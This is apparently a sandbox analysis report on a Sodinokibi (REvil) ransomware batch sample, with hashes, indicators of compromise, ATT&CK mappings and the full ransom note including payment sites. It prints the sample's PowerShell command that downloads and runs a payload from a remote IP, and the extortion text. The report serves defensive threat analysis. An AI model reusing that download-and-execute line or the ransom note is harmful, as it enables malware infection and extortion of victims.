sodinokibi | 0c2979fbb38e64c1f010da3bf048f308add447789e3490462a4a2914882501bc

General

Target

3ebef916c89bfab6725e5179bc66e52e.bat
Size

220B
MD5

ffba72e711c822550ffada7128fa23c1
SHA1

8e0fecaddf1765771895425d408b902606e17e69
SHA256

0c2979fbb38e64c1f010da3bf048f308add447789e3490462a4a2914882501bc
SHA512

4863cc96608a32708f4843bdb275bedfd88435e55316a38ff22e4fbf7453fd194785a8c9f78efe55e3d3149e9dbdb284517a1d6d4f1bff25ea8abe457be7e1a7

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/3ebef916c89bfab6725e5179bc66e52e

Extracted

Path

C:\01p7fq-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 01p7fq. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E16582DF25936703 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/E16582DF25936703 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Khia3+6RpaX1oPh70wrqji1Ltl688H+kNwzuCbdiGRkRdR1qgM2nY65XglzHAEVt GNEb2vWIxtKJgvYOkQYnmFe5ilzkknMPOX/NUeq1nIPgGAvLiJ9Cy5ad0wmw8PNc ItNasdX5V0ZnB66v/FRhob0UV8uu3kQL1XxBfWEazzDtML0xfKfckWG0k7I4eAKw FpP0Nnl0KZSeoa1ha2ESV1npavCPM9QNu5J8ejh/vyFHgSh6jXcA7X2EzqwtRFa8 EBcA8yyVWVCNlORAozBV9IijKC8Uq5ZCilXcx+djXgbgkqEI0vtyeGEqzbk7Q9BM YLxQQ9lULErU33cepuYS58sW0N6Ct7f5+qYUaSNEP8hmcobZ3ttukDb2CTjhTHe/ 1Bsum9U/lCp3fSbm/mploeaKNybTXrHVE5p2GMS3Ivg06RBh6sg8FfkTFn7P/3Zc /ScDFvS+GCcxanCKCfPKRNJUYkDKDSIFM5M2T2vemktffk8GUlc6R7/BZlLVqP7l T3nazrW6djsCT4BeoOdTU3ZPL+lcu7H4e48h6jiiUzVg7l7E91wFMZYW7aBVrJ8+ aztvZog0+jJybqQLiYXBMt0e0cCbJtDxdKKAqSnZ/tG7KsGRSjesqDC0YyExh1hf YfaHZqay2F0HKN/i3VTzfld0GQWSuJBA2MXLpQCMOAekbke+7SP1LgFioFaVOwtC wy0HFzN7MjWg68BCUbwzzMrwx6WFrm1pA/cJQS+BiaAMMB3aK3BW/eCuny1k/zHm cIV2ew+1eXUIm0vRdbJ6bxUp1BPI2/qTS8idORUehsLhLAhDgBADTMupQRixAMYd pexjNboo1lMX4GTo8yG9myj3sb93ENRDbzu8IO0PxBcXuUWFUVHXwa0g6UNvt5cv zxQQwzAwP75nXEk5bgUdnG580zWlOIKqU8YpcFWddYBFtsVVYOJQIo5X45ZkMKag eybGADnzqojDxSjMN6iLHggFq8RvDl9R1cehHZt3mvAUslH/NmU/gBOr7dLlScTE xYmv/KojRXSG831fXdjl1+UjyKdWfN1EQ6akClQWM99/GgtmtkQoLNu2Sa9TJUPj gKPStx/ms2I0f7NL7LiUfAVMrvliL62RMRvRtceVq5ynyrlppzuaLzYZclaopY6e x4QTvlUudXD3tN1pbXM+thKLwCvnSM8uQwrEHu3eVAX2aCwCzo56S+evgI/NPID9 nToZ5aPg682ZUIo27YMjR6gz8pBz1FJ1sx9hHyMbW1kG3FaZoXnfeqG2gWDISmpq rsT516we/bjAOnFMEkWl3Q== ----------------------------------------------------------------------------------------- We gathered the most sensitive and confidential information about your transactions,billing,contracts,clients and partners. And be assure that if you wouldn't pay,all files and documents would be published for everyones view and also we would notify all your clients and partners about the leakage with direct links. And If we get payment from you. All your data will be deleted from our servers. You can read about us by writing in google REvill ransomware. We value our reputation !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E16582DF25936703

http://decryptor.cc/E16582DF25936703

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Blacklisted process makes network request 75 IoCs

Processes:

powershell.exe

flow	pid	process
8	804	powershell.exe
13	804	powershell.exe
15	804	powershell.exe
17	804	powershell.exe
19	804	powershell.exe
21	804	powershell.exe
23	804	powershell.exe
25	804	powershell.exe
27	804	powershell.exe
30	804	powershell.exe
33	804	powershell.exe
35	804	powershell.exe
37	804	powershell.exe
39	804	powershell.exe
41	804	powershell.exe
43	804	powershell.exe
45	804	powershell.exe
47	804	powershell.exe
49	804	powershell.exe
51	804	powershell.exe
53	804	powershell.exe
55	804	powershell.exe
56	804	powershell.exe
57	804	powershell.exe
58	804	powershell.exe
60	804	powershell.exe
62	804	powershell.exe
63	804	powershell.exe
65	804	powershell.exe
67	804	powershell.exe
69	804	powershell.exe
71	804	powershell.exe
73	804	powershell.exe
75	804	powershell.exe
77	804	powershell.exe
79	804	powershell.exe
81	804	powershell.exe
83	804	powershell.exe
85	804	powershell.exe
87	804	powershell.exe
89	804	powershell.exe
91	804	powershell.exe
93	804	powershell.exe
95	804	powershell.exe
97	804	powershell.exe
99	804	powershell.exe
101	804	powershell.exe
103	804	powershell.exe
105	804	powershell.exe
107	804	powershell.exe
109	804	powershell.exe
111	804	powershell.exe
113	804	powershell.exe
115	804	powershell.exe
117	804	powershell.exe
119	804	powershell.exe
122	804	powershell.exe
124	804	powershell.exe
126	804	powershell.exe
128	804	powershell.exe
130	804	powershell.exe
132	804	powershell.exe
134	804	powershell.exe
136	804	powershell.exe

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\OutExport.tif => \??\c:\users\admin\pictures\OutExport.tif.01p7fq	powershell.exe
File renamed	C:\Users\Admin\Pictures\SwitchProtect.tif => \??\c:\users\admin\pictures\SwitchProtect.tif.01p7fq	powershell.exe
File renamed	C:\Users\Admin\Pictures\UnprotectCompress.tif => \??\c:\users\admin\pictures\UnprotectCompress.tif.01p7fq	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\EnterUnblock.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\EnterUnblock.tiff => \??\c:\users\admin\pictures\EnterUnblock.tiff.01p7fq	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9tzs299f233.bmp"	powershell.exe

Drops file in Program Files directory 22 IoCs

Processes:

powershell.exe

description	ioc	process
File created	\??\c:\program files (x86)\01p7fq-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CompareRegister.vsdm	powershell.exe
File opened for modification	\??\c:\program files\PushExpand.dot	powershell.exe
File opened for modification	\??\c:\program files\SwitchRequest.aiff	powershell.exe
File opened for modification	\??\c:\program files\RegisterProtect.wma	powershell.exe
File opened for modification	\??\c:\program files\RemoveUndo.wmx	powershell.exe
File created	\??\c:\program files\01p7fq-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CompressResume.M2TS	powershell.exe
File opened for modification	\??\c:\program files\ConfirmStep.odt	powershell.exe
File opened for modification	\??\c:\program files\ConvertToUndo.jtx	powershell.exe
File opened for modification	\??\c:\program files\FormatHide.doc	powershell.exe
File opened for modification	\??\c:\program files\ProtectStep.mov	powershell.exe
File opened for modification	\??\c:\program files\UnlockPop.dotx	powershell.exe
File opened for modification	\??\c:\program files\InitializeSync.xsl	powershell.exe
File opened for modification	\??\c:\program files\RepairConnect.aifc	powershell.exe
File opened for modification	\??\c:\program files\SaveExit.vdx	powershell.exe
File opened for modification	\??\c:\program files\CheckpointAdd.ogg	powershell.exe
File opened for modification	\??\c:\program files\DisconnectFormat.wax	powershell.exe
File opened for modification	\??\c:\program files\FormatSearch.dwg	powershell.exe
File opened for modification	\??\c:\program files\MoveCopy.xlsm	powershell.exe
File opened for modification	\??\c:\program files\RegisterUninstall.js	powershell.exe
File opened for modification	\??\c:\program files\SwitchNew.htm	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe

description	ioc	process
File opened for modification	C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat	svchost.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = ec84d4173682d601	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0"	svchost.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe

pid process

804 powershell.exe
804 powershell.exe
804 powershell.exe
804 powershell.exe
804 powershell.exe

pid	process
804	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

svchost.exepowershell.exevssvc.exe

description	pid	process
Token: SeShutdownPrivilege	1180	svchost.exe
Token: SeCreatePagefilePrivilege	1180	svchost.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeTakeOwnershipPrivilege	804	powershell.exe
Token: SeBackupPrivilege	3968	vssvc.exe
Token: SeRestorePrivilege	3968	vssvc.exe
Token: SeAuditPrivilege	3968	vssvc.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 2784 wrote to memory of 804	2784	cmd.exe	powershell.exe
PID 2784 wrote to memory of 804	2784	cmd.exe	powershell.exe
PID 2784 wrote to memory of 804	2784	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3ebef916c89bfab6725e5179bc66e52e.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3ebef916c89bfab6725e5179bc66e52e');Invoke-BBWAIYOYNUVEV;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1180

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3968

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/804-0-0x0000000000000000-mapping.dmp

Download
memory/804-1-0x0000000073DF0000-0x00000000744DE000-memory.dmp

Filesize
6.9MB

Download
memory/804-2-0x0000000004A60000-0x0000000004A61000-memory.dmp

Filesize
4KB

Download
memory/804-3-0x00000000076C0000-0x00000000076C1000-memory.dmp

Filesize
4KB

Download
memory/804-4-0x00000000073F0000-0x00000000073F1000-memory.dmp

Filesize
4KB

Download
memory/804-5-0x0000000007590000-0x0000000007591000-memory.dmp

Filesize
4KB

Download
memory/804-6-0x0000000007600000-0x0000000007601000-memory.dmp

Filesize
4KB

Download
memory/804-7-0x0000000007ED0000-0x0000000007ED1000-memory.dmp

Filesize
4KB

Download
memory/804-8-0x0000000007D10000-0x0000000007D11000-memory.dmp

Filesize
4KB

Download
memory/804-9-0x0000000008620000-0x0000000008621000-memory.dmp

Filesize
4KB

Download
memory/804-10-0x0000000008570000-0x0000000008571000-memory.dmp

Filesize
4KB

Download
memory/804-11-0x0000000009D00000-0x0000000009D01000-memory.dmp

Filesize
4KB

Download
memory/804-12-0x0000000009280000-0x0000000009281000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads